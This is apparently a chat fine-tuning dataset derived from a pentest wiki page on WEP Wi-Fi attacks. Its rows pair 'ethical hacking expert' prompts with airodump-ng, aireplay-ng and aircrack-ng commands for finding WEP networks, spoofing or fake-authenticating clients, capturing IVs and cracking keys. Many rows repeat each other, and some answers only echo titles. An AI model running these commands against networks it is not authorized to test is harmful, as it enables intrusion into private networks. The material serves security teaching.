Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ WEP - Requirements", "response": "Aircrack-ng is a complete suite of tools to assess WiFi network security. The suite offers may famous tool like airbase-ng, aircrack-ng, airdecap-ng, airdecloak-ng, airdrop-ng, aireplay-ng, airmon-ng, airodump-ng, besside-ng, dcrack, easside-ng, packetforge-ng, tkiptun-ng, wesside-ng.\n\nDepending on the wireless network configuration and on the context, there are different attack scenarios that can be followed but in order to carry on those attacks, there are requirements that need to be met.", "metadata": {"corpus_index": 1649, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 🛠️ WEP - Find target networks work?"}, {"role": "assistant", "content": "First of all, testers can look out for access points using WEP with airodump-ng.\n\n``bash\nairodump --encrypt WEP $wlan_interface\n``\n\n![](<./assets/airodump find networks.png>){.rawimg}"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 🛠️ WEP - Find target networks work?", "response": "First of all, testers can look out for access points using WEP with airodump-ng.\n\n``bash\nairodump --encrypt WEP $wlan_interface\n``\n\n![](<./assets/airodump find networks.png>){.rawimg}", "metadata": {"corpus_index": 1650, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🛠️ WEP - Find target networks"}, {"role": "assistant", "content": "First of all, testers can look out for access points using WEP with airodump-ng.\n\n``bash\nairodump --encrypt WEP $wlan_interface\n``\n\n![](<./assets/airodump find networks.png>){.rawimg}"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🛠️ WEP - Find target networks", "response": "First of all, testers can look out for access points using WEP with airodump-ng.\n\n``bash\nairodump --encrypt WEP $wlan_interface\n``\n\n![](<./assets/airodump find networks.png>){.rawimg}", "metadata": {"corpus_index": 1650, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the airodump command for 🛠️ wep - find target networks"}, {"role": "assistant", "content": "airodump --encrypt WEP $wlan_interface"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the airodump command for 🛠️ wep - find target networks", "response": "airodump --encrypt WEP $wlan_interface", "metadata": {"corpus_index": 1651, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "airodump"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 🛠️ WEP - Find target networks?"}, {"role": "assistant", "content": "airodump --encrypt WEP $wlan_interface"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 🛠️ WEP - Find target networks?", "response": "airodump --encrypt WEP $wlan_interface", "metadata": {"corpus_index": 1651, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `airodump --encrypt WEP $wlan_interface`?"}, {"role": "assistant", "content": "This command is used for 🛠️ wep - find target networks. Find target networks"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `airodump --encrypt WEP $wlan_interface`?", "response": "This command is used for 🛠️ wep - find target networks. Find target networks", "metadata": {"corpus_index": 1651, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain 🛠️ WEP - Find connected clients"}, {"role": "assistant", "content": "Another important thing to know is if clients are authenticated to the access point. Depending on the situation, different attacks can be carried out. In order to gather that information, testers can use airodump-ng to capture 802.11 frames between clients and the target AP. In the following example, frames were captured with two clients.\n\n``bash\nairodump-ng --channel $channel --bssid 'TA:RG:ET:BS:SI:DD' $wlan_interface\n``\n\n![](<./assets/airodump find clients.png>){.rawimg}"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain 🛠️ WEP - Find connected clients", "response": "Another important thing to know is if clients are authenticated to the access point. Depending on the situation, different attacks can be carried out. In order to gather that information, testers can use airodump-ng to capture 802.11 frames between clients and the target AP. In the following example, frames were captured with two clients.\n\n``bash\nairodump-ng --channel $channel --bssid 'TA:RG:ET:BS:SI:DD' $wlan_interface\n``\n\n![](<./assets/airodump find clients.png>){.rawimg}", "metadata": {"corpus_index": 1652, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ WEP - Find connected clients"}, {"role": "assistant", "content": "Another important thing to know is if clients are authenticated to the access point. Depending on the situation, different attacks can be carried out. In order to gather that information, testers can use airodump-ng to capture 802.11 frames between clients and the target AP. In the following example, frames were captured with two clients.\n\n``bash\nairodump-ng --channel $channel --bssid 'TA:RG:ET:BS:SI:DD' $wlan_interface\n``\n\n![](<./assets/airodump find clients.png>){.rawimg}"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ WEP - Find connected clients", "response": "Another important thing to know is if clients are authenticated to the access point. Depending on the situation, different attacks can be carried out. In order to gather that information, testers can use airodump-ng to capture 802.11 frames between clients and the target AP. In the following example, frames were captured with two clients.\n\n``bash\nairodump-ng --channel $channel --bssid 'TA:RG:ET:BS:SI:DD' $wlan_interface\n``\n\n![](<./assets/airodump find clients.png>){.rawimg}", "metadata": {"corpus_index": 1652, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the airodump-ng command to 🛠️ wep - find connected clients"}, {"role": "assistant", "content": "airodump-ng --channel $channel --bssid 'TA:RG:ET:BS:SI:DD' $wlan_interface"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the airodump-ng command to 🛠️ wep - find connected clients", "response": "airodump-ng --channel $channel --bssid 'TA:RG:ET:BS:SI:DD' $wlan_interface", "metadata": {"corpus_index": 1653, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "airodump-ng"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ WEP - Find connected clients"}, {"role": "assistant", "content": "airodump-ng --channel $channel --bssid 'TA:RG:ET:BS:SI:DD' $wlan_interface"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ WEP - Find connected clients", "response": "airodump-ng --channel $channel --bssid 'TA:RG:ET:BS:SI:DD' $wlan_interface", "metadata": {"corpus_index": 1653, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `airodump-ng --channel $channel --bssid 'TA:RG:ET:BS:SI:DD' $wlan_interface`?"}, {"role": "assistant", "content": "This command is used for 🛠️ wep - find connected clients. Find connected clients"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `airodump-ng --channel $channel --bssid 'TA:RG:ET:BS:SI:DD' $wlan_interface`?", "response": "This command is used for 🛠️ wep - find connected clients. Find connected clients", "metadata": {"corpus_index": 1653, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 🛠️ WEP - Obtain an associated state"}, {"role": "assistant", "content": "In order to inject frames from a client to an access point, the client has to be known by the AP (i.e. be associated). \n\nWhen using aireplay-ng for various attacks (ARP replay, fragmentation, chopchop, ...), it is possible to set the -h option along with the MAC address of an authenticated client. The authenticated clients can be gathered with airodump-ng.\n\nWhen no clients are connected to the AP, or when the tester doesn't want to spoof a legitimate client's MAC address to inject frames, it is required to operate a fake authentication attack in order to associate the client with the AP."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 🛠️ WEP - Obtain an associated state", "response": "In order to inject frames from a client to an access point, the client has to be known by the AP (i.e. be associated). \n\nWhen using aireplay-ng for various attacks (ARP replay, fragmentation, chopchop, ...), it is possible to set the -h option along with the MAC address of an authenticated client. The authenticated clients can be gathered with airodump-ng.\n\nWhen no clients are connected to the AP, or when the tester doesn't want to spoof a legitimate client's MAC address to inject frames, it is required to operate a fake authentication attack in order to associate the client with the AP.", "metadata": {"corpus_index": 1654, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 🛠️ WEP - Obtain an associated state?"}, {"role": "assistant", "content": "In order to inject frames from a client to an access point, the client has to be known by the AP (i.e. be associated). \n\nWhen using aireplay-ng for various attacks (ARP replay, fragmentation, chopchop, ...), it is possible to set the -h option along with the MAC address of an authenticated client. The authenticated clients can be gathered with airodump-ng.\n\nWhen no clients are connected to the AP, or when the tester doesn't want to spoof a legitimate client's MAC address to inject frames, it is required to operate a fake authentication attack in order to associate the client with the AP."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 🛠️ WEP - Obtain an associated state?", "response": "In order to inject frames from a client to an access point, the client has to be known by the AP (i.e. be associated). \n\nWhen using aireplay-ng for various attacks (ARP replay, fragmentation, chopchop, ...), it is possible to set the -h option along with the MAC address of an authenticated client. The authenticated clients can be gathered with airodump-ng.\n\nWhen no clients are connected to the AP, or when the tester doesn't want to spoof a legitimate client's MAC address to inject frames, it is required to operate a fake authentication attack in order to associate the client with the AP.", "metadata": {"corpus_index": 1654, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 🛠️ WEP - Attacks work?"}, {"role": "assistant", "content": "> [!TIP]\n> Basically, the easiest attack paths come down to the following. \"Client spoofing\" means using a legitimate client's MAC address with aireplay-ng's -h option when operating packet injection attacks to the router (i.e. arpreplay, fragmentation, chopchop).\n\n| Scenarios | Open | SKA |\n| ----------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| Connected clients | sniffing + arpreplay (with client spoofing) + deauth + cracking | sniffing + arpreplay (with client spoofing) + deauth + cracking |\n| No clients | sniffing + fake auth + fragmentation or chopchop + cracking | :cold_sweat: |"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 🛠️ WEP - Attacks work?", "response": "> [!TIP]\n> Basically, the easiest attack paths come down to the following. \"Client spoofing\" means using a legitimate client's MAC address with aireplay-ng's -h option when operating packet injection attacks to the router (i.e. arpreplay, fragmentation, chopchop).\n\n| Scenarios | Open | SKA |\n| ----------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| Connected clients | sniffing + arpreplay (with client spoofing) + deauth + cracking | sniffing + arpreplay (with client spoofing) + deauth + cracking |\n| No clients | sniffing + fake auth + fragmentation or chopchop + cracking | :cold_sweat: |", "metadata": {"corpus_index": 1655, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ WEP - Attacks?"}, {"role": "assistant", "content": "> [!TIP]\n> Basically, the easiest attack paths come down to the following. \"Client spoofing\" means using a legitimate client's MAC address with aireplay-ng's -h option when operating packet injection attacks to the router (i.e. arpreplay, fragmentation, chopchop).\n\n| Scenarios | Open | SKA |\n| ----------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| Connected clients | sniffing + arpreplay (with client spoofing) + deauth + cracking | sniffing + arpreplay (with client spoofing) + deauth + cracking |\n| No clients | sniffing + fake auth + fragmentation or chopchop + cracking | :cold_sweat: |"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ WEP - Attacks?", "response": "> [!TIP]\n> Basically, the easiest attack paths come down to the following. \"Client spoofing\" means using a legitimate client's MAC address with aireplay-ng's -h option when operating packet injection attacks to the router (i.e. arpreplay, fragmentation, chopchop).\n\n| Scenarios | Open | SKA |\n| ----------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| Connected clients | sniffing + arpreplay (with client spoofing) + deauth + cracking | sniffing + arpreplay (with client spoofing) + deauth + cracking |\n| No clients | sniffing + fake auth + fragmentation or chopchop + cracking | :cold_sweat: |", "metadata": {"corpus_index": 1655, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is 🛠️ WEP - Sniffing & cracking?"}, {"role": "assistant", "content": "When attacking WEP networks, testers \"just\" need to gather a sufficient amount (\\~20,000 to 60,000 depending on the key size) of IVs (Initialization Vectors) to operate a known-plaintext attack and find the secret key. This amount is indicated in the #Data column in airodump-ng's output. It is hence required to run airodump-ng in the background when operating any of the following attacks. In certain scenarios, it will print additional information (like SSID of hidden networks, authentication types for WEP SKA, ...) or capture useful data (keystreams, frames captures, ...).\n\n``bash\nairodump-ng --channel $channel --bssid 'TA:RG:ET:BS:SI:DD' --write $output_file $wlan_interface\n`\n\n![](<./assets/sniffing and cracking airodump.png>){.rawimg}\n\nWhile airodump-ng is running, testers can launch aircrack-ng that will retry cracking the secret key every 5.000 IVs.\n\n`bash\naircrack-ng $output_file.cap\n``\n\n![](<./assets/sniffing and cracking aircrack.png>){.rawimg}\n\nFYI, for the WEP cracking process, the \"PTW attack\" (named after its creators Pyshkin, Tews, and Weinmann) will be used in the cracking process which is much more efficient that the standard bruteforce one."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is 🛠️ WEP - Sniffing & cracking?", "response": "When attacking WEP networks, testers \"just\" need to gather a sufficient amount (\\~20,000 to 60,000 depending on the key size) of IVs (Initialization Vectors) to operate a known-plaintext attack and find the secret key. This amount is indicated in the #Data column in airodump-ng's output. It is hence required to run airodump-ng in the background when operating any of the following attacks. In certain scenarios, it will print additional information (like SSID of hidden networks, authentication types for WEP SKA, ...) or capture useful data (keystreams, frames captures, ...).\n\n``bash\nairodump-ng --channel $channel --bssid 'TA:RG:ET:BS:SI:DD' --write $output_file $wlan_interface\n`\n\n![](<./assets/sniffing and cracking airodump.png>){.rawimg}\n\nWhile airodump-ng is running, testers can launch aircrack-ng that will retry cracking the secret key every 5.000 IVs.\n\n`bash\naircrack-ng $output_file.cap\n``\n\n![](<./assets/sniffing and cracking aircrack.png>){.rawimg}\n\nFYI, for the WEP cracking process, the \"PTW attack\" (named after its creators Pyshkin, Tews, and Weinmann) will be used in the cracking process which is much more efficient that the standard bruteforce one.", "metadata": {"corpus_index": 1656, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 🛠️ WEP - Sniffing & cracking?"}, {"role": "assistant", "content": "When attacking WEP networks, testers \"just\" need to gather a sufficient amount (\\~20,000 to 60,000 depending on the key size) of IVs (Initialization Vectors) to operate a known-plaintext attack and find the secret key. This amount is indicated in the #Data column in airodump-ng's output. It is hence required to run airodump-ng in the background when operating any of the following attacks. In certain scenarios, it will print additional information (like SSID of hidden networks, authentication types for WEP SKA, ...) or capture useful data (keystreams, frames captures, ...).\n\n``bash\nairodump-ng --channel $channel --bssid 'TA:RG:ET:BS:SI:DD' --write $output_file $wlan_interface\n`\n\n![](<./assets/sniffing and cracking airodump.png>){.rawimg}\n\nWhile airodump-ng is running, testers can launch aircrack-ng that will retry cracking the secret key every 5.000 IVs.\n\n`bash\naircrack-ng $output_file.cap\n``\n\n![](<./assets/sniffing and cracking aircrack.png>){.rawimg}\n\nFYI, for the WEP cracking process, the \"PTW attack\" (named after its creators Pyshkin, Tews, and Weinmann) will be used in the cracking process which is much more efficient that the standard bruteforce one."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 🛠️ WEP - Sniffing & cracking?", "response": "When attacking WEP networks, testers \"just\" need to gather a sufficient amount (\\~20,000 to 60,000 depending on the key size) of IVs (Initialization Vectors) to operate a known-plaintext attack and find the secret key. This amount is indicated in the #Data column in airodump-ng's output. It is hence required to run airodump-ng in the background when operating any of the following attacks. In certain scenarios, it will print additional information (like SSID of hidden networks, authentication types for WEP SKA, ...) or capture useful data (keystreams, frames captures, ...).\n\n``bash\nairodump-ng --channel $channel --bssid 'TA:RG:ET:BS:SI:DD' --write $output_file $wlan_interface\n`\n\n![](<./assets/sniffing and cracking airodump.png>){.rawimg}\n\nWhile airodump-ng is running, testers can launch aircrack-ng that will retry cracking the secret key every 5.000 IVs.\n\n`bash\naircrack-ng $output_file.cap\n``\n\n![](<./assets/sniffing and cracking aircrack.png>){.rawimg}\n\nFYI, for the WEP cracking process, the \"PTW attack\" (named after its creators Pyshkin, Tews, and Weinmann) will be used in the cracking process which is much more efficient that the standard bruteforce one.", "metadata": {"corpus_index": 1656, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the airodump-ng command for 🛠️ wep - sniffing & cracking"}, {"role": "assistant", "content": "airodump-ng --channel $channel --bssid 'TA:RG:ET:BS:SI:DD' --write $output_file $wlan_interface"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the airodump-ng command for 🛠️ wep - sniffing & cracking", "response": "airodump-ng --channel $channel --bssid 'TA:RG:ET:BS:SI:DD' --write $output_file $wlan_interface", "metadata": {"corpus_index": 1657, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "airodump-ng"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 🛠️ WEP - Sniffing & cracking?"}, {"role": "assistant", "content": "airodump-ng --channel $channel --bssid 'TA:RG:ET:BS:SI:DD' --write $output_file $wlan_interface"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 🛠️ WEP - Sniffing & cracking?", "response": "airodump-ng --channel $channel --bssid 'TA:RG:ET:BS:SI:DD' --write $output_file $wlan_interface", "metadata": {"corpus_index": 1657, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `airodump-ng --channel $channel --bssid 'TA:RG:ET:BS:SI:DD' --write $output_file $wlan_interface`?"}, {"role": "assistant", "content": "This command is used for 🛠️ wep - sniffing & cracking. Sniffing & cracking"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `airodump-ng --channel $channel --bssid 'TA:RG:ET:BS:SI:DD' --write $output_file $wlan_interface`?", "response": "This command is used for 🛠️ wep - sniffing & cracking. Sniffing & cracking", "metadata": {"corpus_index": 1657, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the aircrack-ng command for 🛠️ wep - sniffing & cracking"}, {"role": "assistant", "content": "aircrack-ng $output_file.cap"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the aircrack-ng command for 🛠️ wep - sniffing & cracking", "response": "aircrack-ng $output_file.cap", "metadata": {"corpus_index": 1658, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "aircrack-ng"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ WEP - Sniffing & cracking during a pentest?"}, {"role": "assistant", "content": "aircrack-ng $output_file.cap"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ WEP - Sniffing & cracking during a pentest?", "response": "aircrack-ng $output_file.cap", "metadata": {"corpus_index": 1658, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `aircrack-ng $output_file.cap`?"}, {"role": "assistant", "content": "This command is used for 🛠️ wep - sniffing & cracking. Sniffing & cracking"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `aircrack-ng $output_file.cap`?", "response": "This command is used for 🛠️ wep - sniffing & cracking. Sniffing & cracking", "metadata": {"corpus_index": 1658, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 🛠️ WEP - Fake authentication work?"}, {"role": "assistant", "content": "When no clients are connected to the AP, or when the tester doesn't want to spoof a legitimate client's MAC address to inject frames, it is required to operate a fake authentication attack in order to associate the client with the AP. This can be done with aireplay-ng. In the following example, the authentication mode was set to OPEN on the access point. For SKA access points, aireplay-ng will print \"Switching to shared key authentication\" instead of \"Authentication successful\".\n\n``bash\naireplay-ng --fakeauth 0 -a 'TA:RG:ET:BS:SI:DD' $wlan_interface\n`\n\n![](<./assets/fake authentication aireplay.png>){.rawimg}\n\nWhen the authentication mode in use is not OPEN, but rather SKA, the tester can either \n\n* spoof a legitimate client's MAC address when attacking with aireplay-ng with option -h.\n* wait for a legitimate client to connect to the AP (or force it), capture the authentication, have airodump-ng extract the keystream from it, and use it with a known-plaintext attack to bypass the SKA mode requirement (.i.e the need to know the secret key).\n\n> [!WARNING]\n> TODO : I've had issues with my AP, I need to try again with a RPi or something...\n\nDepending on the scenario, it is advisable to operate fake authentication regularly to keep the association state alive during long attacks. This can be achieved by setting the fakeauth delay to something like 60 (--fakeauth 60) and/or changing the delay between keep-alive packets (-q` option, set to 15 by default)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 🛠️ WEP - Fake authentication work?", "response": "When no clients are connected to the AP, or when the tester doesn't want to spoof a legitimate client's MAC address to inject frames, it is required to operate a fake authentication attack in order to associate the client with the AP. This can be done with aireplay-ng. In the following example, the authentication mode was set to OPEN on the access point. For SKA access points, aireplay-ng will print \"Switching to shared key authentication\" instead of \"Authentication successful\".\n\n``bash\naireplay-ng --fakeauth 0 -a 'TA:RG:ET:BS:SI:DD' $wlan_interface\n`\n\n![](<./assets/fake authentication aireplay.png>){.rawimg}\n\nWhen the authentication mode in use is not OPEN, but rather SKA, the tester can either \n\n* spoof a legitimate client's MAC address when attacking with aireplay-ng with option -h.\n* wait for a legitimate client to connect to the AP (or force it), capture the authentication, have airodump-ng extract the keystream from it, and use it with a known-plaintext attack to bypass the SKA mode requirement (.i.e the need to know the secret key).\n\n> [!WARNING]\n> TODO : I've had issues with my AP, I need 